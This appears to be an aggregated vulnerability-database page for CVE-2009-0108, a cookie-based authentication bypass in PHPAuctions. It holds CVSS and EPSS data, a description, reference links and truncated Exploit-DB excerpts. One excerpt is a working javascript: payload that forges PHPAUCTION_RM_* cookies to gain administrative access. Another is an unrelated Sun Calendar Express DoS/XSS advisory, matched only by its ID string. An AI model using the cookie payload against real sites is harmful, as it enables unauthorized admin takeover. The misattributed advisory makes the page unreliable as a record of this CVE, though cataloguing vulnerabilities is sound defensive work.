CVE-2009-0108
Published: 2009-01-09
Priority: P3 (54) | high | 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.55% (83.1th percentile)
PHPAuctions (aka PHPAuctionSystem) allows remote attackers to bypass authentication and gain administrative access via modified (1) PHPAUCTION_RM_ID, (2) PHPAUCTION_RM_NAME, (3) PHPAUCTION_RM_USERNAME, and (4) PHPAUCTION_RM_EMAIL cookies.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpauctions | phpauctions | — | — |
No detection rules found.
Exploit-DB
Sun Calendar Express Web Server - Denial of Service / Cross-Site Scripting
exploitdb·2009-03-31
---
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple vulnerabilities in Sun Calendar Express Web Server
1. *Advisory Information*
Title: Multiple vulnerabilities in Sun Calendar Express Web Server
Advisory ID: CORE-2009-0108
Advisory URL: http://www.coresecurity.com/content/sun-calendar-express
Date published: 2009-03-31
Date of last update: 2009-03-31
Vendors contacted: Sun Microsystems
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Denial of service (DoS), Cross site scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 34150, 34152, 34153
CVE Name: N/A
3. *Vulnerability Description*
Several vulnerabilities h
Exploit-DB
PHPAuctionSystem - Insecure Cookie Handling
exploitdb·2009-01-05
CVE-2009-0108 PHPAuctionSystem - Insecure Cookie Handling
---
[~] PHPAuctionSystem Insecure Cookie Handling Vuln.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 05.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~] MOST IMPORTANT NOTE: ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------
javascript:document.cookie = "PHPAUCTION_RM_ID=[ID]; path=/"; document.cookie = "PHPAUCTION_RM_NAME=[Real_name]; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=[User_name]; path=/"; "PHPAUCTION_RM_EMAIL=[email]; path=/";
exp for demo: ( username: sallama )
javascript:document.co
No writeups or analysis indexed.
http://osvdb.org/51146
http://secunia.com/advisories/33331
http://securityreason.com/securityalert/4891
http://www.securityfocus.com/bid/33120
https://www.exploit-db.com/exploits/7674